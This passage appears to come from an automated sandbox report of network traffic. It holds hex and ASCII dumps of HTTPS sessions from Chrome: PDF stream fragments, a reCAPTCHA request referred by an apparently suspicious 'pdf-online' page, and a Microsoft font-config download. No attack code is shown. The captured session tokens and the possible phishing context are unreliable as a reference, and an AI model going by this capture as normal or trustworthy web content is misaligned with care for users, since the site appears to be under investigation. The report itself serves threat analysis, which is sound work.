                                              2024-09-27 06:18:02 UTC1369INData Raw: 30 2f 41 76 67 57 69 64 74 68 20 35 33 36 2f 4d 61 78 57 69 64 74 68 20 31 37 38 31 2f 46 6f 6e 74 57 65 69 67 68 74 20 37 30 30 2f 58 48 65 69 67 68 74 20 32 35 30 2f 53 74 65 6d 56 20 35 33 2f 46 6f 6e 74 42 42 6f 78 5b 20 2d 35 31 39 20 2d 32 35 30 20 31 32 36 33 20 37 35 30 5d 20 2f 46 6f 6e 74 46 69 6c 65 32 20 31 32 31 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 37 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 45 78 74 47 53 74 61 74 65 2f 42 4d 2f 4e 6f 72 6d 61 6c 2f 63 61 20 31 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 38 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 45 78 74 47 53 74 61 74 65 2f 42 4d 2f 4e 6f 72 6d 61 6c 2f 43 41 20 31 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 39 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 46 6f 6e 74 2f 53 75
                                              Data Ascii: 0/AvgWidth 536/MaxWidth 1781/FontWeight 700/XHeight 250/StemV 53/FontBBox[ -519 -250 1263 750] /FontFile2 121 0 R>>endobj7 0 obj<</Type/ExtGState/BM/Normal/ca 1>>endobj8 0 obj<</Type/ExtGState/BM/Normal/CA 1>>endobj9 0 obj<</Type/Font/Su
                                              2024-09-27 06:18:02 UTC1369INData Raw: 6e 74 20 2d 32 35 30 2f 43 61 70 48 65 69 67 68 74 20 37 35 30 2f 41 76 67 57 69 64 74 68 20 35 32 31 2f 4d 61 78 57 69 64 74 68 20 31 37 34 33 2f 46 6f 6e 74 57 65 69 67 68 74 20 34 30 30 2f 58 48 65 69 67 68 74 20 32 35 30 2f 53 74 65 6d 56 20 35 32 2f 46 6f 6e 74 42 42 6f 78 5b 20 2d 35 30 33 20 2d 32 35 30 20 31 32 34 30 20 37 35 30 5d 20 2f 46 6f 6e 74 46 69 6c 65 32 20 31 32 37 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 31 35 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 58 4f 62 6a 65 63 74 2f 53 75 62 74 79 70 65 2f 49 6d 61 67 65 2f 57 69 64 74 68 20 31 39 35 2f 48 65 69 67 68 74 20 36 31 2f 43 6f 6c 6f 72 53 70 61 63 65 2f 44 65 76 69 63 65 52 47 42 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 2f 49 6e 74 65 72 70 6f 6c 61 74
                                              Data Ascii: nt -250/CapHeight 750/AvgWidth 521/MaxWidth 1743/FontWeight 400/XHeight 250/StemV 52/FontBBox[ -503 -250 1240 750] /FontFile2 127 0 R>>endobj15 0 obj<</Type/XObject/Subtype/Image/Width 195/Height 61/ColorSpace/DeviceRGB/BitsPerComponent 8/Interpolat
                                              2024-09-27 06:18:02 UTC1369INData Raw: da 33 ea f4 8a e1 46 85 8c 1a 3d da 48 82 16 48 be be be b0 48 59 9f ab ff bf 5b 5e 01 ab 7b ce 9c b9 b6 02 92 42 d0 9c 49 c9 c9 d5 0f 1e 4a f6 2d 66 16 14 91 14 de 70 20 39 3b 77 a6 19 56 ac 58 f9 df a4 fa f0 38 f0 6b ae 51 33 3c 01 a4 a0 a0 57 e8 27 de 9a 95 a5 26 b5 69 d3 86 26 15 16 15 1b 6d 50 68 81 84 87 7d fb 46 19 b5 67 c4 a8 51 c8 60 4f 20 29 14 12 12 8a 65 82 64 f7 7e 31 2d 49 52 6c c3 81 04 b3 8a 66 60 fa f0 b7 fc c3 34 35 b8 4b 17 dd 66 78 02 48 5f a5 7e 43 73 46 45 45 d1 d4 ed 3b 77 d1 d4 ee e1 e1 ba 42 74 81 04 5a 97 b9 5e db 18 68 e6 67 9f 7d d6 61 6f 20 81 30 65 c0 0a 95 e9 de 9b b7 ef c8 1c 4c 38 1a 0c 24 ac 13 2b 2a ab d4 54 18 42 11 91 91 94 d9 ec 96 9e 9e ae db 0c b7 03 09 3a f9 c6 cd 5b 6a b6 f2 ca 4a 2c ac 68 c3 66 7f fd 35 95 93 99
                                              Data Ascii: 3F=HHHY[^{BIJ-fp 9;wVX8kQ3<W'&i&mPh}FgQ`O )ed~1-IRlf`45KfxH_~CsFEE;wBtZ^hg}ao 0eL8$+*TB:[jJ,hf5
                                              2024-09-27 06:18:02 UTC1369INData Raw: 80 74 f8 e8 ef 9e c0 89 29 bd fd f6 db a6 6d 83 1a 11 0b 71 21 1a 09 3a 47 10 4b c7 df df 1f 93 8e 25 81 98 a1 9c 9d 3b 1b 09 c4 82 22 67 ef 5e 4b 02 2b 2a ab 7a f5 ea a5 15 65 15 48 b5 75 aa 89 5d 3f 71 d4 bf 2e 27 66 f5 9a a1 0c 90 c4 1e 2f 9e 23 7c 50 d3 b6 69 5d fe 18 b9 00 a4 bf b0 f4 cb 0e d8 3f 5a 69 4d 9b 36 fd f5 e0 41 6d fe aa ea 9a df f2 0f 6f df b9 0b ff 52 af 33 95 cf 5d b8 a8 6b 96 c0 36 fb 69 cd 1a 6d fe 07 8f 6a 8f 1d 2f 80 40 18 48 d4 d3 49 65 3c 54 ef 74 a8 e4 02 90 c0 98 53 e8 99 5d 48 48 28 cb 00 3b 6d c5 8a 95 cb 7e f8 61 d7 9e 3d ec ed 54 6f 19 19 20 c9 5f 22 73 23 61 fa 36 75 46 c2 c0 34 0d c3 c5 80 b4 74 d9 32 35 09 53 18 d4 4b df be 51 eb 32 d7 6b eb d2 8d 52 a5 75 00 86 21 34 7a f4 68 6a 06 a3 49 c3 47 8e d4 ee a3 6a dd 26 41 98
                                              Data Ascii: t)mq!:GK%;"g^K+*zeHu]?q.'f/#|Pi]?ZiM6AmoR3]k6imj/@HIe<TtS]HH(;m~a=To _"s#a6uF4t25SKQ2kRu!4zhjIGj&A
                                              2024-09-27 06:18:02 UTC1369INData Raw: 6e 5e 9e a4 47 9f 96 18 90 d0 39 6a c8 17 18 d2 30 d5 be 9c 31 43 1b 40 1e df 48 f7 36 b4 6e 24 40 c8 8c e8 d9 53 41 1d c6 32 24 a7 2d 5a c2 60 09 46 45 5a 81 58 15 6a 05 62 4a 8d 89 89 55 b6 95 00 aa 0e 1d 3a a4 a4 a4 b0 55 00 78 d5 ea d5 4c 9a 18 48 a0 15 ab 56 d1 0c 77 ee 95 6b 7f 17 8f 06 15 87 8d 8d 89 8c 1e ff c1 7a 49 4a 9e 4e 85 dc b8 75 1b 23 c2 fe 40 82 21 e1 9a cf aa 42 ae b9 91 18 bd 32 3e ab 60 a7 02 86 28 db c7 56 19 f3 b2 ae 5f 8a 43 18 52 0c 1f da e8 b4 08 93 8b 76 03 d3 14 48 7e 7e 7e f4 27 0c 6a eb d6 ef 54 01 86 84 84 ea ee e6 a1 25 90 76 a2 b0 50 bb 7c 53 94 bc 9d 81 84 8f 32 63 e6 4c f9 2d 23 5d b2 0a 24 54 9a 38 65 aa c0 3c c0 e7 63 91 87 4d 39 67 df 7e c1 af a8 00 60 df 65 64 58 12 88 6f aa eb 75 60 0a 24 87 de 69 1d bd 18 88 09 d4
                                              Data Ascii: n^G9j01C@H6n$@SA2$-Z`FEZXjbJU:UxLHVwkzIJNu#@!B2>`(V_CRvH~~~'jT%vP|S2cL-#]$T8e<cM9g~`edXou`$i
                                              2024-09-27 06:18:02 UTC1369INData Raw: 2c 0f fe 6f 5f ee 17 02 21 21 53 4e f3 08 ae 81 1e 10 18 51 9e c4 fd 92 da 1a 4b c8 2a f0 4d e0 10 78 d1 11 fe 0a b5 4b 37 5d 3e b8 9f e5 11 ee bc 80 c7 96 fe ae 27 2c f3 13 81 90 f0 df df e2 8e 59 13 ee 03 c2 03 a0 ae 57 1b fd b9 2f 08 49 d0 c0 62 49 e9 09 ca 09 f5 55 2c 23 90 61 6a fe 4c e2 3f 02 21 19 67 b9 83 be e2 03 c2 bb a0 e2 f5 2a 07 2d cd 07 84 3f 80 35 1c b4 12 d0 1e e5 11 c8 46 39 7d bf 3d 20 04 12 bb 8f 3d e8 35 76 c8 e0 19 21 ba 59 d2 ea 32 41 f0 4e 5a ed 1d 21 fc 8a 64 34 65 41 91 a5 e0 df 24 20 dc f5 1d 28 ad 7d 48 60 08 c4 b1 9b 3d ea 42 03 c2 c1 17 35 b9 17 9c 73 85 76 36 c7 30 08 e5 49 8a 0c 62 11 a6 09 45 da e2 79 04 32 15 94 df 92 40 11 48 e4 97 4c ed f5 ec 65 f0 f4 52 b5 7d 29 b4 87 ce 66 10 3c bf 54 0f 89 45 16 09 08 64 87 34 c4 09
                                              Data Ascii: ,o_!!SNQK*MxK7]>',YW/IbIU,#ajL?!g*-?5F9}= =5v!Y2ANZ!d4eA$ (}H`=B5sv60IbEy2@HLeR})f<TEd4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449750216.58.206.364433104C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:02 UTC963OUTGET /recaptcha/api2/anchor?ar=1&k=6LdIzuYpAAAAAHT5nKyqfZa1ITwX_EWoYwnF-Nhd&co=aHR0cHM6Ly9wZGYtb25saW5lLm9uLWZsZWVrLmFwcDo0NDM.&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=normal&cb=lw8g0bn9ca2d HTTP/1.1
                                              Host: www.google.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: iframe
                                              Referer: https://pdf-online.on-fleek.app/
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-09-27 06:18:02 UTC1161INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                              Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 27 Sep 2024 06:18:02 GMT
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-QkazdedEwXSExl--415RaA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2024-09-27 06:18:02 UTC229INData Raw: 35 37 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79
                                              Data Ascii: 5760<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cy
                                              2024-09-27 06:18:02 UTC1390INData Raw: 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34
                                              Data Ascii: rillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A64
                                              2024-09-27 06:18:02 UTC1390INData Raw: 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 30 30
                                              Data Ascii: 0AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00
                                              2024-09-27 06:18:02 UTC1390INData Raw: 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45
                                              Data Ascii: s.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqE
                                              2024-09-27 06:18:02 UTC1390INData Raw: 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 37 34 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74
                                              Data Ascii: 0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUt
                                              2024-09-27 06:18:02 UTC1390INData Raw: 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72
                                              Data Ascii: 8-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/r
                                              2024-09-27 06:18:02 UTC1390INData Raw: 22 68 69 64 64 65 6e 22 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 2d 74 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 30 33 41 46 63 57 65 41 37 50 53 4c 74 49 44 64 5f 33 6c 53 58 59 65 4d 44 44 6d 73 48 41 43 61 6a 46 44 71 69 43 36 72 2d 46 6e 4c 68 65 72 79 68 33 42 63 6f 77 43 71 76 42 30 48 77 65 71 7a 6e 6e 4e 59 42 6a 6d 47 7a 69 71 36 58 34 65 34 63 7a 73 4b 6d 73 4b 63 5f 31 65 74 74 56 75 4a 66 57 31 49 64 78 70 74 66 65 45 32 4e 4e 50 6d 64 57 4b 38 30 44 55 6c 6e 37 44 33 37 6d 62 73 4c 7a 35 74 71 6f 71 77 59 48 49 37 34 79 74 59 65 5a 52 6a 5a 73 55 7a 4a 78 62 51 79 48 38 47 68 70 58 32 45 76 42 6c 73 4b 64 68 68 77 48 48 46 45 56 56 68 43 74 37 42 6e 47 42 53 67 47 78 45 70 65 47 67 69 55 4b 43 4f 49 70 35 34 6f 43 31 4c 2d 4c 54 52 55 48 54 54
                                              Data Ascii: "hidden" id="recaptcha-token" value="03AFcWeA7PSLtIDd_3lSXYeMDDmsHACajFDqiC6r-FnLheryh3BcowCqvB0HweqznnNYBjmGziq6X4e4czsKmsKc_1ettVuJfW1IdxptfeE2NNPmdWK80DUln7D37mbsLz5tqoqwYHI74ytYeZRjZsUzJxbQyH8GhpX2EvBlsKdhhwHHFEVVhCt7BnGBSgGxEpeGgiUKCOIp54oC1L-LTRUHTT
                                              2024-09-27 06:18:02 UTC1390INData Raw: 78 6f 5a 41 37 51 73 77 50 67 69 4b 73 70 37 6a 6a 58 77 79 6d 41 45 46 33 62 48 53 46 47 2d 58 61 55 53 31 6f 59 76 30 6f 41 2d 53 66 62 73 63 5f 76 44 44 79 43 66 51 33 68 69 49 74 32 67 66 47 63 2d 6f 31 38 74 7a 79 4e 73 72 71 72 72 67 54 61 6e 4a 72 6c 35 55 77 39 45 4b 5f 58 2d 5a 4c 34 71 61 49 75 38 53 31 57 54 6f 4a 4e 68 62 71 78 55 5f 4b 52 45 42 74 77 72 49 71 42 61 70 38 36 74 55 42 54 6b 43 65 4d 37 50 5f 69 59 4f 39 73 71 48 52 43 52 72 4b 68 56 68 71 4e 74 32 4f 76 64 77 36 5f 57 32 52 77 51 66 44 32 48 32 6e 45 53 6e 2d 69 4f 5a 33 47 68 76 73 55 6a 55 79 4e 75 73 6e 38 39 64 44 49 5f 58 2d 7a 65 51 58 50 6d 33 4d 7a 72 78 5f 4f 70 76 57 53 6d 4c 5a 66 5f 78 72 62 56 4d 70 37 51 54 73 6d 73 59 57 31 52 39 67 50 53 55 44 52 46 4b 30 2d 79
                                              Data Ascii: xoZA7QswPgiKsp7jjXwymAEF3bHSFG-XaUS1oYv0oA-Sfbsc_vDDyCfQ3hiIt2gfGc-o18tzyNsrqrrgTanJrl5Uw9EK_X-ZL4qaIu8S1WToJNhbqxU_KREBtwrIqBap86tUBTkCeM7P_iYO9sqHRCRrKhVhqNt2Ovdw6_W2RwQfD2H2nESn-iOZ3GhvsUjUyNusn89dDI_X-zeQXPm3Mzrx_OpvWSmLZf_xrbVMp7QTsmsYW1R9gPSUDRFK0-y
                                              2024-09-27 06:18:02 UTC1390INData Raw: 54 68 36 56 6d 6c 70 4f 56 46 31 52 57 74 72 54 6b 39 36 53 48 64 4b 53 6c 6f 76 61 58 4a 43 5a 7a 52 70 57 46 5a 53 62 6d 4e 69 4e 45 46 69 64 6d 64 44 61 6b 38 35 64 53 74 79 61 48 5a 45 4b 30 46 35 5a 44 46 47 65 6e 63 32 63 31 4a 7a 62 45 52 69 54 45 4a 30 64 57 78 44 61 56 5a 30 62 57 34 78 4f 55 6c 35 52 48 6f 32 62 6d 4a 46 54 31 55 78 4e 7a 4a 32 55 44 46 71 4c 79 74 33 4e 47 5a 77 61 33 4e 55 51 57 4a 42 57 48 45 7a 63 6b 4e 46 64 30 5a 4f 56 32 70 71 65 6e 6c 5a 63 30 64 7a 57 6c 42 6d 61 57 39 6f 5a 55 64 56 53 48 6c 72 54 32 67 77 52 6b 5a 57 61 32 46 4e 4c 30 46 45 51 6e 68 32 54 45 52 6e 56 6e 4a 6e 4f 47 56 53 61 6b 6c 52 53 30 74 79 62 47 6c 77 52 32 52 44 59 30 6c 6f 56 6a 68 71 57 46 42 6f 4f 57 4a 5a 4f 58 4a 72 55 7a 68 74 55 31 4e 46
                                              Data Ascii: Th6VmlpOVF1RWtrTk96SHdKSlovaXJCZzRpWFZSbmNiNEFidmdDak85dStyaHZEK0F5ZDFGenc2c1JzbERiTEJ0dWxDaVZ0bW4xOUl5RHo2bmJFT1UxNzJ2UDFqLyt3NGZwa3NUQWJBWHEzckNFd0ZOV2pqenlZc0dzWlBmaW9oZUdVSHlrT2gwRkZWa2FNL0FEQnh2TERnVnJnOGVSaklRS0tybGlwR2RDY0loVjhqWFBoOWJZOXJrUzhtU1NF
                                              2024-09-27 06:18:02 UTC1390INData Raw: 46 55 32 39 52 5a 30 6c 34 64 31 5a 45 65 45 74 70 52 56 4a 31 4b 33 6b 32 64 44 5a 61 54 53 38 78 63 55 68 52 65 6e 70 56 53 32 56 58 62 55 52 73 54 56 70 6d 56 32 4a 54 55 6b 64 72 54 33 70 30 61 56 6c 45 57 47 4a 54 5a 7a 68 46 62 55 74 78 61 32 78 5a 65 46 46 35 4d 32 67 33 5a 32 31 4c 55 44 41 34 52 46 4a 73 52 6b 31 7a 51 33 4d 72 61 47 68 50 56 6a 5a 6b 65 6a 64 61 57 54 5a 74 5a 33 68 35 63 6b 74 30 52 31 4d 78 51 30 63 76 62 47 56 31 4d 6d 74 44 4e 33 64 35 51 56 68 32 63 30 6c 32 5a 57 52 7a 51 54 5a 77 57 6c 4a 6a 57 58 4a 51 59 6b 6c 59 64 31 68 52 52 6d 78 35 61 6a 41 77 4d 6d 68 6e 55 46 46 75 62 6b 64 4f 55 6c 55 32 53 31 70 4c 4d 48 4e 4a 51 55 78 30 62 54 56 6c 55 57 78 4d 52 31 4a 4b 4d 57 64 6a 53 6c 6f 78 5a 55 64 4d 4e 45 4e 6c 56 30
                                              Data Ascii: FU29RZ0l4d1ZEeEtpRVJ1K3k2dDZaTS8xcUhRenpVS2VXbURsTVpmV2JTUkdrT3p0aVlEWGJTZzhFbUtxa2xZeFF5M2g3Z21LUDA4RFJsRk1zQ3MraGhPVjZkejdaWTZtZ3h5ckt0R1MxQ0cvbGV1MmtDN3d5QVh2c0l2ZWRzQTZwWlJjWXJQYklYd1hRRmx5ajAwMmhnUFFubkdOUlU2S1pLMHNJQUx0bTVlUWxMR1JKMWdjSloxZUdMNENlV0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.449753184.28.90.27443
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:18:03 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              Accept-Encoding: identity
                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                              Range: bytes=0-2147483646
                                              User-Agent: Microsoft BITS/7.8
                                              Host: fs.microsoft.com
                                              2024-09-27 06:18:03 UTC514INHTTP/1.1 200 OK
                                              ApiVersion: Distribute 1.1
                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                              Content-Type: application/octet-stream
                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                              Server: ECAcc (lpl/EF06)
                                              X-CID: 11
                                              X-Ms-ApiVersion: Distribute 1.2
                                              X-Ms-Region: prod-weu-z1
                                              Cache-Control: public, max-age=37637
                                              Date: Fri, 27 Sep 2024 06:18:03 GMT
                                              Content-Length: 55
                                              Connection: close
                                              X-CID: 2
                                              2024-09-27 06:18:03 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.44976013.85.23.86443
                                              TimestampBytes transferredDirectionData
